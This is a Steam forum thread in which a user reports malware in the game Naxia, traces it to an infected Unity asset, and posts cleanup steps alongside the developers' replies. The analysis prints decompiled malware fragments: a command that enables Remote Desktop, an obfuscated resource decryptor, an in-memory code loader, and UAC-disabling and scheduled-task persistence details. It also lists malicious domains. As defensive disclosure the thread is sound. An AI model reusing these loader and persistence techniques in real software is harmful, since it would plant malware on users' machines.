Warning - This Game Is Infected With A Virus

Store Page

Naxia

All Discussions Screenshots Artwork Broadcasts Videos News Guides Reviews

Naxia > General Discussions > Topic Details

This topic has been locked

atom0s

Aug 18, 2020 @ 11:32pm

Warning - This Game Is Infected With A Virus

Update 08/21/2020 - New Game Update Fixes This Issue

Please see my post here:
https://steamcommunity.com/app/1049220/discussions/0/2801756152800557606/#c2801756152810253090

The game is no longer infected. Leaving the rest of the info below for full disclosure though.

.
.
.
.
.
.

Warning - This Game Is Infected

While the developers are claiming otherwise in the recent topics, this game is infected with a virus. I would avoid this game at all costs currently until this is sorted!

What the game is doing:

Upon launch, the game will extract a DLL that it is manually loading from memory called 'version.dll'. This is fake renamed threading module which is extracted to:
C:\Users\<yourname>\AppData\Local\Temp\version.dll

This file is not just a standard Version information based library, it attempts to connect to the internet AND it restores the Remote Desktop Service permissions on your system to attempt to allow unwanted access to your system:

std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign( &Dst, "cmd.exe /c \"sc config SessionEnv start= auto&sc start SessionEnv\"", 0x41ui64);

SessionEnv is the Remote Desktop service on Windows.This is attempting to restore the startup type for that and force-start it.

It then tries to self-install itself as a .NET framework sub-module via the .NET registry under the name 'tlpless.dll'. This gets the install paths to your .NET framework via the keys here:

SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v2.0.50727

This DLL also takes ANY command line passed to it and starts it in a silent console window attempting to exploit administrative permissions on your system, if the argument /start is present:

std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign( &lpCommandLine, "cmd.exe /c start /b ", 0x14ui64); sub_180002990(&lpCommandLine, &Filename); sub_180002990(&lpCommandLine, " /error"); v7 = (CHAR *)&lpCommandLine; if ( v45 >= 0x10 ) v7 = lpCommandLine; CreateProcessA( 0i64, v7, 0i64, 0i64, 0, 0, 0i64, 0i64, &StartupInfo, (LPPROCESS_INFORMATION)&StartupInfo.hStdOutput); if ( v45 < 0x10 ) goto LABEL_64; v8 = lpCommandLine;

When the tlpless.dll is loaded, it will attempt to check for a valid internet connection via connecting to microsoft.com and google.com. Afterward if valid, it will call a method inside of the tlpless.dll called 'Add':

signed __int64 __fastcall StartAddress(LPVOID lpThreadParameter) { HANDLE v1; // rax HMODULE v2; // rax void (*v4)(void); // rax while ( !InternetCheckConnectionA("http://microsoft.com", 1u, 0) && !InternetCheckConnectionA("http://google.com", 1u, 0) ) Sleep(0x7530u); Sleep(0x7D0u); v1 = OpenThread(0x1FFFFFu, 0, dwThreadId); SuspendThread(v1); v2 = LoadLibraryA("tlpless.dll"); if ( !v2 ) return 1i64; v4 = (void (*)(void))GetProcAddress(v2, "Add"); if ( !v4 ) return 1i64; v4(); Sleep(0xD4A50FFF); Sleep(0xD4A50FFF); Sleep(0xD4A50FFF); return 0i64; }

This will also drop other fake files into your temp folder that mask themselves as .NET related error reporting tools. THESE ARE FAKE. These contain the infected DLLs in their resources.

https://i.imgur.com/AOQCprN.png
Scan: https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/detection

https://i.imgur.com/YLcIk7B.png
Scan: https://www.virustotal.com/gui/file/63ec3ef6eb4e0270e3475b3d4d8c1421275b59f533afc5988b3c25fbd3e0e554/detection

https://i.imgur.com/0gRU1zG.png
Scan: https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/detection

The embedded DLLs are C# loaders that are used to invoke/load other modules. This is half-packed/protected:
https://i.imgur.com/TFvEEMH.png

This method decrypts a hardcoded infected script to exploit the system further.

DO NOT BUY THIS GAME.
DO NOT TRUST THIS GAME.

It is absolutely infected. I am reporting this to Steam as well.

Last edited by atom0s; Aug 21, 2020 @ 3:06pm

A developer of this app has marked a post as the answer to the topic above.
Click here to jump to that post.

Originally posted by Infinite8:

with the help of this user "atom0s" we figure out what happened, we used a third-party package called mesh effect you can find it in the unity asset store https://assetstore.unity.com/packages/vfx/particles/spells/mesh-effects-67803#content, it has a DLL file under demo resources called ICSharpcode.Nrefactory.dll that cause the problem. we remove it from the game and create a ticket for unity about the issue and tell them what is going on with the package, sorry for the problem but now it is fixed. many thanks to atom0s to help us figure it out. this topic will close next week. you can now update the game and enjoy it.

< >

Showing 1-15 of 18 comments

atom0s

Aug 18, 2020 @ 11:33pm

Infected files created/dropped:
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

Modules to look for on your system:
- libntsc*.dll
- GNU\\scntlib*.dll

While running, this will attempt to kill any process with the following partial name matches:
- askmgr
- rocessha
- rocexp
- ystemexplore
- anvir

It will try to download data/info from:
- "<removed>/jipperskrippersservice.ru/other/new.html"
- "<removed>/margancherforfun.com/other/new.html"
- "<removed>/cellavillibycurtiz.ru/other/new.html"

It will look for the following information:
- MoreStarsMoreSpace
- MoreStarsMoreSpace!

Then attempt to split and decrypt more files to install on your system to continue infection.

These new files are loaded with a base assumed class via:

private static string EB(string[] ns, string code) { CSharpCodeProvider csharpCodeProvider = new CSharpCodeProvider(); CompilerParameters compilerParameters = new CompilerParameters { GenerateExecutable = false, GenerateInMemory = true }; compilerParameters.ReferencedAssemblies.Add("System.dll"); compilerParameters.ReferencedAssemblies.Add("mscorlib.dll"); for (int i = 0; i < ns.Length; i++) { compilerParameters.ReferencedAssemblies.Add(ns);
}
CompilerResults compilerResults = csharpCodeProvider.CompileAssemblyFromSource(compilerParameters, new string[]
{
code
});
if (compilerResults.Errors.Count == 0)
{
object obj = compilerResults.CompiledAssembly.CreateInstance("MyNewClass");
if (obj != null)
{
return Convert.ToString(obj.GetType().GetMethod("MyMethod").Invoke(obj, null));
}
}
return "dothis";
}[/code]

atom0s

Aug 18, 2020 @ 11:33pm

If you ran this game, and are potentially infected, then do the following. (DO NOT RESTART YOUR PC BEFORE DOING THIS STUFF!)

1. Uninstall the game until this is dealt with, this game is not safe to run.

2. Clear your temp folder entirely.

3. Delete the infected droppers:
- C:/Users/<yourname/AppData/Local/Temp/version.dll
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

4. Ensure Remote Desktop is disabled on your system:
- See here for more info: https://www.howto-connect.com/enable-disable-remote-desktop-configuration-service-windows-10/

5. Look for any additional instances of 'ntsync.exe' and 'version.dll' you are not familiar with or were created recently when you first/recently launched Naxia. Remove those as well. (Do so with caution, as version.dll can be a legit module for certain applications!)

6. Block all access to the following websites in your hosts file / firewalls:
- jipperskrippersservice [dot] ru
- margancherforfun [dot] com
- cellavillibycurtiz [dot] ru

Infinite8 [developer] Aug 18, 2020 @ 11:41pm

thanks for your report. we are investigating this issue, we will update you about the result.

Scriptiee Aug 19, 2020 @ 9:06am

How the ♥♥♥♥ do you ship a game with an issue like this? Who and what are you out sourcing? This is insane.

Cerberus814 Aug 19, 2020 @ 11:24am

@infinite8 stop talking trash, you scripted that s hit on the game lol.

atom0s

Aug 19, 2020 @ 12:05pm

Another file found to clean/remove:
- C:\Windows\System32\msfte.dll

Kuro X Kage Aug 19, 2020 @ 12:23pm

Thanks for the findings atom0s! Unbelievable, almost grabbed this on sale.

Infinite8 [developer] Aug 20, 2020 @ 6:59am

Hi, it seems we fixed the issue.
Please update the game then tell us the result. thanks for your cooperation.

Scriptiee Aug 20, 2020 @ 8:40am

That's not enough, what the ♥♥♥♥ was it and how did it get there in the fist place? You should give people explanation and not just "fixed it" how the ♥♥♥♥ did it get there? I recommend every one reports this game to steam as this is ♥♥♥♥♥♥♥♥.

Infinite8 [developer] Aug 20, 2020 @ 8:50am

First of all, we did not know about this issue, as we told you we want to make sure that we fixed it before any explanation, but as we searched and found it was something created by image icon of the game (crystal), we did talk with more people in this week and give data from them about the issue, we did a lot in few days, at least 20 builds to find out what is happened, you can see this link https://answers.unity.com/questions/475053/my-game-has-a-virus-need-fix.html, we did remove the game icon from the player setting (unity3d) as they said in the link, then we try for new build and it seems it's gone! as we found that it can happen when you have an SVG image that converted into .png file, it can inject any code in SVG that caused this kind of problem. we are still searching for this issue. please wait, as we told you before we will update you about the result.

Last edited by Infinite8; Aug 20, 2020 @ 9:08am

#10

wsgroves Aug 20, 2020 @ 12:38pm

Damn that sucks. I was finally going to grab it on sale but I will wait now...

#11

atom0s

Aug 20, 2020 @ 11:32pm

It is not fixed, the game is still infected.

#12

atom0s

Aug 21, 2020 @ 1:05pm

After some more digging, I've found what's infected. The game ships with an infected/fake 'ICSharpCode.NRefactory.dll' library. This is fakely renamed to 'ICSharpCode.NRefactory.dll' from 'Unity.DataContract.dll' and is infected somewhere in Naxia's build process.

This module contains the default expected data of Unity.DataContract, but also includes an obfuscated infected loader. At runtime, this loader will attempt to decrypt a self-contained resource like this:

static c0b89d1135135315cc38faf72ae5a2c5d() { if (c0b89d1135135315cc38faf72ae5a2c5d.ca341f6485be0e85a69fd2b0a4b56cf39 == null) { string text = "VW5pdHkuRGF0YUNvbnRyYWN0JA=="; byte[] array = Convert.FromBase64String(text); text = Encoding.UTF8.GetString(array, 0, array.Length); Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(text); c0b89d1135135315cc38faf72ae5a2c5d.ca341f6485be0e85a69fd2b0a4b56cf39 = c87b7b5b75d14c0091514b9fe24471068.c4d973e50c3a94392daad2fec4c8ff9d9(97L, manifestResourceStream); } } internal static byte[] ced05941962a456a433fd86bac2cf78c8(long c13f99b17b7c2ad3edf46d8907bafefa7, Stream cb7afa863bb27b078b94c77e6467b748b) { Stream stream = cb7afa863bb27b078b94c77e6467b748b; MemoryStream memoryStream = null; for (int i = 1; i < 4; i++) { cb7afa863bb27b078b94c77e6467b748b.ReadByte(); } ushort num = (ushort)cb7afa863bb27b078b94c77e6467b748b.ReadByte(); num = ~num; if ((num & 2) != 0) { DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider(); byte[] array = new byte[8]; cb7afa863bb27b078b94c77e6467b748b.Read(array, 0, 8); descryptoServiceProvider.IV = array; byte[] array2 = new byte[8]; cb7afa863bb27b078b94c77e6467b748b.Read(array2, 0, 8); bool flag = true; foreach (byte b in array2) { if (b != 0) { flag = false; break; } } if (flag) { array2 = c87b7b5b75d14c0091514b9fe24471068.cedfb0601f0470197fc7d5d4935c025e4(Assembly.GetExecutingAssembly()); } descryptoServiceProvider.Key = array2; if (c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032 == null) { if (c87b7b5b75d14c0091514b9fe24471068.c3f6cf188507936a5ec71a9d6161bc01a == 2147483647) { c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Capacity = (int)cb7afa863bb27b078b94c77e6467b748b.Length; } else { c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Capacity = c87b7b5b75d14c0091514b9fe24471068.c3f6cf188507936a5ec71a9d6161bc01a; } } c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Position = 0L; ICryptoTransform cryptoTransform = descryptoServiceProvider.CreateDecryptor(); int inputBlockSize = cryptoTransform.InputBlockSize; int outputBlockSize = cryptoTransform.OutputBlockSize; byte[] array4 = new byte[cryptoTransform.OutputBlockSize]; byte[] array5 = new byte[cryptoTransform.InputBlockSize]; int num2 = (int)cb7afa863bb27b078b94c77e6467b748b.Position; while ((long)(num2 + inputBlockSize) < cb7afa863bb27b078b94c77e6467b748b.Length) { cb7afa863bb27b078b94c77e6467b748b.Read(array5, 0, inputBlockSize); int count = cryptoTransform.TransformBlock(array5, 0, inputBlockSize, array4, 0); c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Write(array4, 0, count); num2 += inputBlockSize; } cb7afa863bb27b078b94c77e6467b748b.Read(array5, 0, (int)(cb7afa863bb27b078b94c77e6467b748b.Length - (long)num2)); byte[] array6 = cryptoTransform.TransformFinalBlock(array5, 0, (int)(cb7afa863bb27b078b94c77e6467b748b.Length - (long)num2)); c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032.Write(array6, 0, array6.Length); stream = c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032; stream.Position = 0L; memoryStream = c87b7b5b75d14c0091514b9fe24471068.c23f88059027c84c0b3da25dca4b08032; } if ((num & 8) != 0) { if (c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810 == null) { if (c87b7b5b75d14c0091514b9fe24471068.c01621a652ae853c86a3f85e897bc33c1 == -2147483648) { c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810.Capacity = (int)stream.Length * 2; } else { c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810.Capacity = c87b7b5b75d14c0091514b9fe24471068.c01621a652ae853c86a3f85e897bc33c1; } } c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810.Position = 0L; DeflateStream deflateStream = new DeflateStream(stream, CompressionMode.Decompress); int num3 = 1000; byte[] buffer = new byte[num3]; int num4; do { num4 = deflateStream.Read(buffer, 0, num3); if (num4 > 0) { c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810.Write(buffer, 0, num4); } } while (num4 >= num3); memoryStream = c87b7b5b75d14c0091514b9fe24471068.ced61c462fd232c61ae470fb53aef3810; } if (memoryStream != null) { return memoryStream.ToArray(); } byte[] array7 = new byte[cb7afa863bb27b078b94c77e6467b748b.Length - cb7afa863bb27b078b94c77e6467b748b.Position]; cb7afa863bb27b078b94c77e6467b748b.Read(array7, 0, array7.Length); return array7; }

The resource is an encrypted, embedded block of Unicode strings that holds all the infection-related data, see here:
https://i.imgur.com/LUPqDkJ.png

As we can see, the expected information I posted above before is all here, with some added info that does not appear to be used all the time.

Firstly, the registry key that is used to tell the infection if the system is currently/already infected is:
HKEY_CURRENT_USER\SOFTWARE\GNU\fver
HKEY_CURRENT_USER\SOFTWARE\GNU\cver

The virus uses this to prevent itself from re-running all the time.

Next is the remote website it uses to ensure you have internet access to continue the infection while executing. It will ping that site to check for internet status.

Next are the various bits of data it uses to locate where to drop files and infect your system:
/Microsoft.NET/Framework/ntsync.exe
/Microsoft.NET/Framework/version.dll

It pulls that data from the registry to get the full path to your .NET install folders as I showed in my previous posts.

Next the other files it tries to drop are in the temp folder which are:
- TPGenLic.dll
- cmst.exe
- version.dll

It will also try to add a scheduled task on the system to continue to re-infect the system under a DiskCleanup fake name. If this is successful in adding itself, it's hidden within:
Microsoft > Windows > DiskCleanup

As a fake task there to execute cmst.exe whenever possible.

This will also try to disable UAC/remove the prompt to prevent itself from being caught running as admin or running an untrusted file via editing the following registry key:
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- ConsentPromptBehaviorAdmin

Then the rest of what it does is what I posted above in my previous posts.

#13

atom0s

Aug 21, 2020 @ 2:55pm

Originally posted by Yeldo:
Man you can clearly see these devs do not care about their game, they must be trying to source money a different way by ♥♥♥♥♥♥♥ ours PCS stay away

This is not the case, and was not directly the dev's fault. Unity has an asset store that allows anyone to upload and sell assets for games to share with other developers. Unity makes it very clear they are not responsible for damage and do not actively scan for infected assets. They go based on a trust/faith based system and report based investigations.

Naxia was using a package that is currently infected, the specific one being:
https://assetstore.unity.com/packages/vfx/particles/spells/mesh-effects-67803

This asset is where the infected file originated from and is bundled into the game when built against it.

Did Naxia developers intentionally infect their game? No.
Did Naxia developers handle this a little poorly? Yes. But the lead dev reached out to me directly and worked with me via Discord to get this resolved so I will say once they took it a bit more serious and understood the issue, they did care and did work to get it fixed with me.

The developer just pushed a new update which fixes this issue and the game, currently, is no longer infected.

As with any game that has a marketplace/asset store (Unity, CryEngine, Unreal) there is always this kind of risk. Naxia is not unique to this kind of infection/attack.

#14